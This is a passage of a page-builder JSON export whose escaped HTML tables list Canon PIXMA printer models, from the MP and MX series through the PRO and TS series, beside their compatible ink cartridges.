(Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP628<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP638<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP648<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP800<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP800R<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP810<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP830<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP970<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP988<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP996<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d0130d\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fc01984\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6549880\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX308<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-831 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-830 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX328<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX338<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX347<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX366<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX426<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX876<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX886<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-726 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-725 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-1<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-29 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Dark Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Light Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Yellow)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b7fc065\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"387b65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-10<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-72 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-100<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-42 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Light Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TR8570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS207<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS307<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS5070<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-771 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-770 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-770XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS5170<\\/p><\\/td><td width=\\\"208\\\"><p>CL-741 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-741XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740\\/CL-741 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"736141f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9e8521a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS8270<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS9170<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS9570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td 